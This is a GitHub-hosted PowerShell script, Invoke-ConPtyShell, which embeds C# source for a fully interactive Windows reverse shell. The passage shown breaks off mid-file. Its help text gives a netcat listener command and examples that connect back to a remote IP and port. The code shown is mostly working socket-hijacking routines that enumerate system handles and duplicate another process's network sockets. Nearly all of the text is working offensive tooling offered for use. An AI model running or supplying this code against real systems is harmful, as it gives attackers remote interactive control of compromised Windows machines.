-
Notifications
You must be signed in to change notification settings - Fork 0
/
Invoke-ConPtyShell.ps1
1715 lines (1537 loc) · 72.8 KB
/
Invoke-ConPtyShell.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
function Invoke-ConPtyShell
{
<#
.SYNOPSIS
ConPtyShell - Fully Interactive Reverse Shell for Windows
Author: splinter_code
License: MIT
Source: https://github.com/antonioCoco/ConPtyShell
.DESCRIPTION
ConPtyShell - Fully interactive reverse shell for Windows
Properly set the rows and cols values. You can retrieve it from
your terminal with the command "stty size".
You can avoid to set rows and cols values if you run your listener
with the following command:
stty raw -echo; (stty size; cat) | nc -lvnp 3001
If you want to change the console size directly from powershell
you can paste the following commands:
$width=80
$height=24
$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)
$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)
.PARAMETER RemoteIp
The remote ip to connect
.PARAMETER RemotePort
The remote port to connect
.PARAMETER Rows
Rows size for the console
Default: "24"
.PARAMETER Cols
Cols size for the console
Default: "80"
.PARAMETER CommandLine
The commandline of the process that you are going to interact
Default: "powershell.exe"
.EXAMPLE
PS>Invoke-ConPtyShell 10.0.0.2 3001
Description
-----------
Spawn a reverse shell
.EXAMPLE
PS>Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90
Description
-----------
Spawn a reverse shell with specific rows and cols size
.EXAMPLE
PS>Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90 -CommandLine cmd.exe
Description
-----------
Spawn a reverse shell (cmd.exe) with specific rows and cols size
.EXAMPLE
PS>Invoke-ConPtyShell -Upgrade -Rows 30 -Cols 90
Description
-----------
Upgrade your current shell with specific rows and cols size
#>
Param
(
[Parameter(Position = 0)]
[String]
$RemoteIp,
[Parameter(Position = 1)]
[String]
$RemotePort,
[Parameter()]
[String]
$Rows = "24",
[Parameter()]
[String]
$Cols = "80",
[Parameter()]
[String]
$CommandLine = "powershell.exe",
[Parameter()]
[Switch]
$Upgrade
)
if( $PSBoundParameters.ContainsKey('Upgrade') ) {
$RemoteIp = "upgrade"
$RemotePort = "shell"
}
else{
if(-Not($PSBoundParameters.ContainsKey('RemoteIp'))) {
throw "RemoteIp missing parameter"
}
if(-Not($PSBoundParameters.ContainsKey('RemotePort'))) {
throw "RemotePort missing parameter"
}
}
$parametersConPtyShell = @($RemoteIp, $RemotePort, $Rows, $Cols, $CommandLine)
Add-Type -TypeDefinition $Source -Language CSharp;
$output = [ConPtyShellMainClass]::ConPtyShellMain($parametersConPtyShell)
Write-Output $output
}
$Source = @"
using System;
using System.IO;
using System.Text;
using System.Threading;
using System.Net;
using System.Net.Sockets;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Collections.Generic;
public class ConPtyShellException : Exception
{
private const string error_string = "[-] ConPtyShellException: ";
public ConPtyShellException() { }
public ConPtyShellException(string message) : base(error_string + message) { }
}
public class DeadlockCheckHelper
{
private bool deadlockDetected;
private IntPtr targetHandle;
private delegate uint LPTHREAD_START_ROUTINE(uint lpParam);
[DllImport("kernel32.dll")]
private static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
[DllImport("Kernel32.dll", SetLastError = true)]
private static extern IntPtr CreateThread(uint lpThreadAttributes, uint dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
private uint ThreadCheckDeadlock(uint threadParams)
{
IntPtr objPtr = IntPtr.Zero;
objPtr = SocketHijacking.NtQueryObjectDynamic(this.targetHandle, SocketHijacking.OBJECT_INFORMATION_CLASS.ObjectNameInformation, 0);
this.deadlockDetected = false;
if (objPtr != IntPtr.Zero) Marshal.FreeHGlobal(objPtr);
return 0;
}
public bool CheckDeadlockDetected(IntPtr tHandle)
{
this.deadlockDetected = true;
this.targetHandle = tHandle;
LPTHREAD_START_ROUTINE delegateThreadCheckDeadlock = new LPTHREAD_START_ROUTINE(this.ThreadCheckDeadlock);
IntPtr hThread = IntPtr.Zero;
uint threadId = 0;
//we need native threads, C# threads hang and go in lock. We need to avoids hangs on named pipe so... No hangs no deadlocks... no pain no gains...
hThread = CreateThread(0, 0, delegateThreadCheckDeadlock, IntPtr.Zero, 0, out threadId);
WaitForSingleObject(hThread, 1500);
//we do not kill the "pending" threads here with TerminateThread() because it will crash the whole process if we do it on locked threads.
//just some waste of threads :(
CloseHandle(hThread);
return this.deadlockDetected;
}
}
public static class SocketHijacking
{
private const uint NTSTATUS_SUCCESS = 0x00000000;
private const uint NTSTATUS_INFOLENGTHMISMATCH = 0xc0000004;
private const uint NTSTATUS_BUFFEROVERFLOW = 0x80000005;
private const uint NTSTATUS_BUFFERTOOSMALL = 0xc0000023;
private const int NTSTATUS_PENDING = 0x00000103;
private const int WSA_FLAG_OVERLAPPED = 0x1;
private const int DUPLICATE_SAME_ACCESS = 0x2;
private const int SystemHandleInformation = 16;
private const int PROCESS_DUP_HANDLE = 0x0040;
private const int SIO_TCP_INFO = unchecked((int)0xD8000027);
private const int SG_UNCONSTRAINED_GROUP = 0x1;
private const int SG_CONSTRAINED_GROUP = 0x2;
private const uint IOCTL_AFD_GET_CONTEXT = 0x12043;
private const int EVENT_ALL_ACCESS = 0x1f0003;
private const int SynchronizationEvent = 1;
private const UInt32 INFINITE = 0xFFFFFFFF;
private enum SOCKET_STATE : uint
{
SocketOpen = 0,
SocketBound = 1,
SocketBoundUdp = 2,
SocketConnected = 3,
SocketClosed = 3
}
private enum AFD_GROUP_TYPE : uint
{
GroupTypeNeither = 0,
GroupTypeConstrained = SG_CONSTRAINED_GROUP,
GroupTypeUnconstrained = SG_UNCONSTRAINED_GROUP
}
public enum OBJECT_INFORMATION_CLASS : int
{
ObjectBasicInformation = 0,
ObjectNameInformation = 1,
ObjectTypeInformation = 2,
ObjectAllTypesInformation = 3,
ObjectHandleInformation = 4
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
private struct SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
public ushort UniqueProcessId;
public ushort CreatorBackTraceIndex;
public byte ObjectTypeIndex;
public byte HandleAttributes;
public ushort HandleValue;
public IntPtr Object;
public IntPtr GrantedAccess;
}
[StructLayout(LayoutKind.Sequential)]
private struct GENERIC_MAPPING
{
public int GenericRead;
public int GenericWrite;
public int GenericExecute;
public int GenericAll;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
private struct OBJECT_TYPE_INFORMATION_V2
{
public UNICODE_STRING TypeName;
public uint TotalNumberOfObjects;
public uint TotalNumberOfHandles;
public uint TotalPagedPoolUsage;
public uint TotalNonPagedPoolUsage;
public uint TotalNamePoolUsage;
public uint TotalHandleTableUsage;
public uint HighWaterNumberOfObjects;// PeakObjectCount;
public uint HighWaterNumberOfHandles;// PeakHandleCount;
public uint HighWaterPagedPoolUsage;
public uint HighWaterNonPagedPoolUsage;
public uint HighWaterNamePoolUsage;
public uint HighWaterHandleTableUsage;
public uint InvalidAttributes;
public GENERIC_MAPPING GenericMapping;
public uint ValidAccessMask;
public byte SecurityRequired;//bool
public byte MaintainHandleCount;//bool
public byte TypeIndex;
public byte ReservedByte;
public uint PoolType;
public uint DefaultPagedPoolCharge;// PagedPoolUsage;
public uint DefaultNonPagedPoolCharge;//NonPagedPoolUsage;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
private struct OBJECT_NAME_INFORMATION
{
public UNICODE_STRING Name;
}
[StructLayout(LayoutKind.Sequential)]
private struct UNICODE_STRING
{
public ushort Length;
public ushort MaximumLength;
public IntPtr Buffer;
}
[StructLayout(LayoutKind.Sequential)]
private struct WSAData
{
public short wVersion;
public short wHighVersion;
public short iMaxSockets;
public short iMaxUdpDg;
public IntPtr lpVendorInfo;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 257)]
public string szDescription;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 129)]
public string szSystemStatus;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
private struct WSAPROTOCOLCHAIN
{
public int ChainLen;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 7)]
public uint[] ChainEntries;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
private struct WSAPROTOCOL_INFO
{
public uint dwServiceFlags1;
public uint dwServiceFlags2;
public uint dwServiceFlags3;
public uint dwServiceFlags4;
public uint dwProviderFlags;
public Guid ProviderId;
public uint dwCatalogEntryId;
public WSAPROTOCOLCHAIN ProtocolChain;
public int iVersion;
public int iAddressFamily;
public int iMaxSockAddr;
public int iMinSockAddr;
public int iSocketType;
public int iProtocol;
public int iProtocolMaxOffset;
public int iNetworkByteOrder;
public int iSecurityScheme;
public uint dwMessageSize;
public uint dwProviderReserved;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 256)]
public string szProtocol;
}
[StructLayout(LayoutKind.Sequential)]
private struct SOCKADDR_IN
{
public short sin_family;
public short sin_port;
public uint sin_addr;
public long sin_zero;
}
[StructLayout(LayoutKind.Sequential)]
private struct TCP_INFO_v0
{
public TcpState State;
public UInt32 Mss;
public UInt64 ConnectionTimeMs;
public byte TimestampsEnabled;
public UInt32 RttUs;
public UInt32 MinRttUs;
public UInt32 BytesInFlight;
public UInt32 Cwnd;
public UInt32 SndWnd;
public UInt32 RcvWnd;
public UInt32 RcvBuf;
public UInt64 BytesOut;
public UInt64 BytesIn;
public UInt32 BytesReordered;
public UInt32 BytesRetrans;
public UInt32 FastRetrans;
public UInt32 DupAcksIn;
public UInt32 TimeoutEpisodes;
public byte SynRetrans;
}
[StructLayout(LayoutKind.Sequential)]
private struct linger
{
public UInt16 l_onoff;
public UInt16 l_linger;
}
[StructLayout(LayoutKind.Sequential, Pack = 0)]
private struct IO_STATUS_BLOCK
{
public int status;
public IntPtr information;
}
[StructLayout(LayoutKind.Sequential)]
private struct SOCK_SHARED_INFO
{
public SOCKET_STATE State;
public Int32 AddressFamily;
public Int32 SocketType;
public Int32 Protocol;
public Int32 LocalAddressLength;
public Int32 RemoteAddressLength;
// Socket options controlled by getsockopt(), setsockopt().
public linger LingerInfo;
public UInt32 SendTimeout;
public UInt32 ReceiveTimeout;
public UInt32 ReceiveBufferSize;
public UInt32 SendBufferSize;
/* Those are the bits in the SocketProerty, proper order:
Listening;
Broadcast;
Debug;
OobInline;
ReuseAddresses;
ExclusiveAddressUse;
NonBlocking;
DontUseWildcard;
ReceiveShutdown;
SendShutdown;
ConditionalAccept;
*/
public ushort SocketProperty;
// Snapshot of several parameters passed into WSPSocket() when creating this socket
public UInt32 CreationFlags;
public UInt32 CatalogEntryId;
public UInt32 ServiceFlags1;
public UInt32 ProviderFlags;
public UInt32 GroupID;
public AFD_GROUP_TYPE GroupType;
public Int32 GroupPriority;
// Last error set on this socket
public Int32 LastError;
// Info stored for WSAAsyncSelect()
public IntPtr AsyncSelecthWnd;
public UInt32 AsyncSelectSerialNumber;
public UInt32 AsyncSelectwMsg;
public Int32 AsyncSelectlEvent;
public Int32 DisabledAsyncSelectEvents;
}
[StructLayout(LayoutKind.Sequential)]
private struct SOCKADDR
{
public UInt16 sa_family;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 14)]
public byte[] sa_data;
}
[StructLayout(LayoutKind.Sequential)]
private struct SOCKET_CONTEXT
{
public SOCK_SHARED_INFO SharedData;
public UInt32 SizeOfHelperData;
public UInt32 Padding;
public SOCKADDR LocalAddress;
public SOCKADDR RemoteAddress;
// Helper Data - found out with some reversing
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 24)]
public byte[] HelperData;
}
private struct SOCKET_BYTESIN
{
public IntPtr handle;
public UInt64 BytesIn;
}
[DllImport("WS2_32.DLL", CharSet = CharSet.Auto, SetLastError = true)]
private static extern int WSADuplicateSocket(IntPtr socketHandle, int processId, ref WSAPROTOCOL_INFO pinnedBuffer);
[DllImport("ws2_32.dll", CharSet = CharSet.Auto, SetLastError = true, CallingConvention = CallingConvention.StdCall)]
private static extern IntPtr WSASocket([In] int addressFamily, [In] int socketType, [In] int protocolType, ref WSAPROTOCOL_INFO lpProtocolInfo, Int32 group1, int dwFlags);
[DllImport("ws2_32.dll", CharSet = CharSet.Auto)]
private static extern Int32 WSAGetLastError();
[DllImport("ws2_32.dll", CharSet = CharSet.Auto, SetLastError = true, CallingConvention = CallingConvention.StdCall)]
private static extern int getpeername(IntPtr s, ref SOCKADDR_IN name, ref int namelen);
// WSAIoctl1 implementation specific for SIO_TCP_INFO control code
[DllImport("Ws2_32.dll", CharSet = CharSet.Auto, SetLastError = true, EntryPoint = "WSAIoctl")]
public static extern int WSAIoctl1(IntPtr s, int dwIoControlCode, ref UInt32 lpvInBuffer, int cbInBuffer, IntPtr lpvOutBuffer, int cbOutBuffer, ref int lpcbBytesReturned, IntPtr lpOverlapped, IntPtr lpCompletionRoutine);
[DllImport("ws2_32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int closesocket(IntPtr s);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr OpenProcess(int processAccess, bool bInheritHandle, int processId);
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool DuplicateHandle(IntPtr hSourceProcessHandle, IntPtr hSourceHandle, IntPtr hTargetProcessHandle, out IntPtr lpTargetHandle, uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);
[DllImport("kernel32.dll")]
private static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll")]
private static extern IntPtr GetCurrentProcess();
[DllImport("ntdll.dll")]
private static extern uint NtQueryObject(IntPtr objectHandle, OBJECT_INFORMATION_CLASS informationClass, IntPtr informationPtr, uint informationLength, ref int returnLength);
[DllImport("ntdll.dll")]
private static extern uint NtQuerySystemInformation(int SystemInformationClass, IntPtr SystemInformation, int SystemInformationLength, ref int returnLength);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
[DllImport("ntdll.dll")]
private static extern int NtCreateEvent(ref IntPtr EventHandle, int DesiredAccess, IntPtr ObjectAttributes, int EventType, bool InitialState);
// NtDeviceIoControlFile1 implementation specific for IOCTL_AFD_GET_CONTEXT IoControlCode
[DllImport("ntdll.dll", EntryPoint = "NtDeviceIoControlFile")]
private static extern int NtDeviceIoControlFile1(IntPtr FileHandle, IntPtr Event, IntPtr ApcRoutine, IntPtr ApcContext, ref IO_STATUS_BLOCK IoStatusBlock, uint IoControlCode, IntPtr InputBuffer, int InputBufferLength, ref SOCKET_CONTEXT OutputBuffer, int OutputBufferLength);
[DllImport("Ws2_32.dll")]
public static extern int ioctlsocket(IntPtr s, int cmd, ref int argp);
//helper method with "dynamic" buffer allocation
private static IntPtr NtQuerySystemInformationDynamic(int infoClass, int infoLength)
{
if (infoLength == 0)
infoLength = 0x10000;
IntPtr infoPtr = Marshal.AllocHGlobal(infoLength);
while (true)
{
uint result = (uint)NtQuerySystemInformation(infoClass, infoPtr, infoLength, ref infoLength);
infoLength = infoLength * 2;
if (result == NTSTATUS_SUCCESS)
return infoPtr;
Marshal.FreeHGlobal(infoPtr); //free pointer when not Successful
if (result != NTSTATUS_INFOLENGTHMISMATCH && result != NTSTATUS_BUFFEROVERFLOW && result != NTSTATUS_BUFFERTOOSMALL)
{
//throw new Exception("Unhandled NtStatus " + result);
return IntPtr.Zero;
}
infoPtr = Marshal.AllocHGlobal(infoLength);
}
}
private static IntPtr QueryObjectTypesInfo()
{
IntPtr ptrObjectTypesInformation = IntPtr.Zero;
ptrObjectTypesInformation = NtQueryObjectDynamic(IntPtr.Zero, OBJECT_INFORMATION_CLASS.ObjectAllTypesInformation, 0);
return ptrObjectTypesInformation;
}
// this from --> https://github.com/hfiref0x/UACME/blob/master/Source/Shared/ntos.h
private static long AlignUp(long address, long align)
{
return (((address) + (align) - 1) & ~((align) - 1));
}
// this works only from win8 and above. If you need a more generic solution you need to use the (i+2) "way" of counting index types.
// credits for this goes to @0xrepnz
// more information here --> https://twitter.com/splinter_code/status/1400873009121013765
private static byte GetTypeIndexByName(string ObjectName)
{
byte TypeIndex = 0;
long TypesCount = 0;
IntPtr ptrTypesInfo = IntPtr.Zero;
ptrTypesInfo = QueryObjectTypesInfo();
TypesCount = Marshal.ReadIntPtr(ptrTypesInfo).ToInt64();
// create a pointer to the first element address of OBJECT_TYPE_INFORMATION_V2
IntPtr ptrTypesInfoCurrent = new IntPtr(ptrTypesInfo.ToInt64() + IntPtr.Size);
for (int i = 0; i < TypesCount; i++)
{
OBJECT_TYPE_INFORMATION_V2 Type = (OBJECT_TYPE_INFORMATION_V2)Marshal.PtrToStructure(ptrTypesInfoCurrent, typeof(OBJECT_TYPE_INFORMATION_V2));
// move pointer to next the OBJECT_TYPE_INFORMATION_V2 object
ptrTypesInfoCurrent = (IntPtr)(ptrTypesInfoCurrent.ToInt64() + AlignUp(Type.TypeName.MaximumLength, (long)IntPtr.Size) + Marshal.SizeOf(typeof(OBJECT_TYPE_INFORMATION_V2)));
if (Type.TypeName.Length > 0 && Marshal.PtrToStringUni(Type.TypeName.Buffer, Type.TypeName.Length / 2) == ObjectName)
{
TypeIndex = Type.TypeIndex;
break;
}
}
Marshal.FreeHGlobal(ptrTypesInfo);
return TypeIndex;
}
private static List<IntPtr> DuplicateSocketsFromHandles(List<IntPtr> sockets)
{
List<IntPtr> dupedSocketsOut = new List<IntPtr>();
if (sockets.Count < 1) return dupedSocketsOut;
foreach (IntPtr sock in sockets)
{
IntPtr dupedSocket = DuplicateSocketFromHandle(sock);
if (dupedSocket != IntPtr.Zero) dupedSocketsOut.Add(dupedSocket);
}
// cleaning all socket handles
foreach (IntPtr sock in sockets)
CloseHandle(sock);
return dupedSocketsOut;
}
private static List<IntPtr> FilterAndOrderSocketsByBytesIn(List<IntPtr> sockets)
{
List<SOCKET_BYTESIN> socketsBytesIn = new List<SOCKET_BYTESIN>();
List<IntPtr> socketsOut = new List<IntPtr>();
foreach (IntPtr sock in sockets)
{
TCP_INFO_v0 sockInfo = new TCP_INFO_v0();
if (!GetSocketTcpInfo(sock, out sockInfo))
{
closesocket(sock);
continue;
}
// Console.WriteLine("debug: Socket handle 0x" + sock.ToString("X4") + " is in tcpstate " + sockInfo.State.ToString());
// we need only active sockets, the remaing sockets are filtered out
if (sockInfo.State == TcpState.SynReceived || sockInfo.State == TcpState.Established)
{
SOCKET_BYTESIN sockBytesIn = new SOCKET_BYTESIN();
sockBytesIn.handle = sock;
sockBytesIn.BytesIn = sockInfo.BytesIn;
socketsBytesIn.Add(sockBytesIn);
}
else
closesocket(sock);
}
if (socketsBytesIn.Count < 1) return socketsOut;
if (socketsBytesIn.Count >= 2)
// ordering for fewer bytes received by the sockets we have a higher chance to get the proper socket
socketsBytesIn.Sort(delegate (SOCKET_BYTESIN a, SOCKET_BYTESIN b) { return (a.BytesIn.CompareTo(b.BytesIn)); });
foreach (SOCKET_BYTESIN sockBytesIn in socketsBytesIn)
{
socketsOut.Add(sockBytesIn.handle);
// Console.WriteLine("debug: Socket handle 0x" + sockBytesIn.handle.ToString("X4") + " total bytes received: " + sockBytesIn.BytesIn.ToString());
}
return socketsOut;
}
private static bool GetSocketTcpInfo(IntPtr socket, out TCP_INFO_v0 tcpInfoOut)
{
int result = -1;
UInt32 tcpInfoVersion = 0;
int bytesReturned = 0;
int tcpInfoSize = Marshal.SizeOf(typeof(TCP_INFO_v0));
IntPtr tcpInfoPtr = Marshal.AllocHGlobal(tcpInfoSize);
result = WSAIoctl1(socket, SIO_TCP_INFO, ref tcpInfoVersion, Marshal.SizeOf(tcpInfoVersion), tcpInfoPtr, tcpInfoSize, ref bytesReturned, IntPtr.Zero, IntPtr.Zero);
if (result != 0)
{
// Console.WriteLine("debug: WSAIoctl1 failed with return code " + result.ToString() + " and wsalasterror: " + WSAGetLastError().ToString());
tcpInfoOut = new TCP_INFO_v0();
return false;
}
TCP_INFO_v0 tcpInfoV0 = (TCP_INFO_v0)Marshal.PtrToStructure(tcpInfoPtr, typeof(TCP_INFO_v0));
tcpInfoOut = tcpInfoV0;
Marshal.FreeHGlobal(tcpInfoPtr);
return true;
}
// this function take a raw handle to a \Device\Afd object as a parameter and returns a handle to a duplicated socket
private static IntPtr DuplicateSocketFromHandle(IntPtr socketHandle)
{
IntPtr retSocket = IntPtr.Zero;
IntPtr duplicatedSocket = IntPtr.Zero;
WSAPROTOCOL_INFO wsaProtocolInfo = new WSAPROTOCOL_INFO();
int status = WSADuplicateSocket(socketHandle, Process.GetCurrentProcess().Id, ref wsaProtocolInfo);
if (status == 0)
{
// we need an overlapped socket for the conpty process but we don't need to specify the WSA_FLAG_OVERLAPPED flag here because it will be ignored (and automatically set) by WSASocket() function if we set the WSAPROTOCOL_INFO structure and if the original socket has been created with the overlapped flag.
duplicatedSocket = WSASocket(wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, ref wsaProtocolInfo, 0, 0);
if (duplicatedSocket.ToInt64() > 0)
{
retSocket = duplicatedSocket;
}
}
return retSocket;
}
//helper method with "dynamic" buffer allocation
public static IntPtr NtQueryObjectDynamic(IntPtr handle, OBJECT_INFORMATION_CLASS infoClass, int infoLength)
{
if (infoLength == 0)
infoLength = Marshal.SizeOf(typeof(int));
IntPtr infoPtr = Marshal.AllocHGlobal(infoLength);
uint result;
while (true)
{
result = (uint)NtQueryObject(handle, infoClass, infoPtr, (uint)infoLength, ref infoLength);
if (result == NTSTATUS_INFOLENGTHMISMATCH || result == NTSTATUS_BUFFEROVERFLOW || result == NTSTATUS_BUFFERTOOSMALL)
{
Marshal.FreeHGlobal(infoPtr);
infoPtr = Marshal.AllocHGlobal((int)infoLength);
continue;
}
else if (result == NTSTATUS_SUCCESS)
break;
else
{
//throw new Exception("Unhandled NtStatus " + result);
break;
}
}
if (result == NTSTATUS_SUCCESS)
return infoPtr;//don't forget to free the pointer with Marshal.FreeHGlobal after you're done with it
else
Marshal.FreeHGlobal(infoPtr);//free pointer when not Successful
return IntPtr.Zero;
}
public static List<IntPtr> GetSocketsTargetProcess(Process targetProcess)
{
OBJECT_NAME_INFORMATION objNameInfo;
long HandlesCount = 0;
IntPtr dupHandle;
IntPtr ptrObjectName;
IntPtr ptrHandlesInfo;
IntPtr hTargetProcess;
string strObjectName;
List<IntPtr> socketsHandles = new List<IntPtr>();
DeadlockCheckHelper deadlockCheckHelperObj = new DeadlockCheckHelper();
hTargetProcess = OpenProcess(PROCESS_DUP_HANDLE, false, targetProcess.Id);
if (hTargetProcess == IntPtr.Zero)
{
Console.WriteLine("Cannot open target process with pid " + targetProcess.Id.ToString() + " for DuplicateHandle access");
return socketsHandles;
}
ptrHandlesInfo = NtQuerySystemInformationDynamic(SystemHandleInformation, 0);
HandlesCount = Marshal.ReadIntPtr(ptrHandlesInfo).ToInt64();
// create a pointer at the beginning of the address of SYSTEM_HANDLE_TABLE_ENTRY_INFO[]
IntPtr ptrHandlesInfoCurrent = new IntPtr(ptrHandlesInfo.ToInt64() + IntPtr.Size);
// get TypeIndex for "File" objects, needed to filter only sockets objects
byte TypeIndexFileObject = GetTypeIndexByName("File");
for (int i = 0; i < HandlesCount; i++)
{
SYSTEM_HANDLE_TABLE_ENTRY_INFO sysHandle;
try
{
sysHandle = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)Marshal.PtrToStructure(ptrHandlesInfoCurrent, typeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO));
}
catch
{
break;
}
//move pointer to next SYSTEM_HANDLE_TABLE_ENTRY_INFO
ptrHandlesInfoCurrent = (IntPtr)(ptrHandlesInfoCurrent.ToInt64() + Marshal.SizeOf(typeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO)));
if (sysHandle.UniqueProcessId != targetProcess.Id || sysHandle.ObjectTypeIndex != TypeIndexFileObject)
continue;
if (DuplicateHandle(hTargetProcess, (IntPtr)sysHandle.HandleValue, GetCurrentProcess(), out dupHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
if (deadlockCheckHelperObj.CheckDeadlockDetected(dupHandle))
{ // this will avoids deadlocks on special named pipe handles
// Console.WriteLine("debug: Deadlock detected");
CloseHandle(dupHandle);
continue;
}
ptrObjectName = NtQueryObjectDynamic(dupHandle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, 0);
if (ptrObjectName == IntPtr.Zero)
{
CloseHandle(dupHandle);
continue;
}
try
{
objNameInfo = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ptrObjectName, typeof(OBJECT_NAME_INFORMATION));
}
catch
{
CloseHandle(dupHandle);
continue;
}
if (objNameInfo.Name.Buffer != IntPtr.Zero && objNameInfo.Name.Length > 0)
{
strObjectName = Marshal.PtrToStringUni(objNameInfo.Name.Buffer, objNameInfo.Name.Length / 2);
// Console.WriteLine("debug: file handle 0x" + dupHandle.ToString("X4") + " strObjectName = " + strObjectName);
if (strObjectName == "\\Device\\Afd")
socketsHandles.Add(dupHandle);
else
CloseHandle(dupHandle);
}
else
CloseHandle(dupHandle);
Marshal.FreeHGlobal(ptrObjectName);
ptrObjectName = IntPtr.Zero;
}
}
Marshal.FreeHGlobal(ptrHandlesInfo);
List<IntPtr> dupedSocketsHandles = DuplicateSocketsFromHandles(socketsHandles);
if (dupedSocketsHandles.Count >= 1)
dupedSocketsHandles = FilterAndOrderSocketsByBytesIn(dupedSocketsHandles);
socketsHandles = dupedSocketsHandles;
return socketsHandles;
}
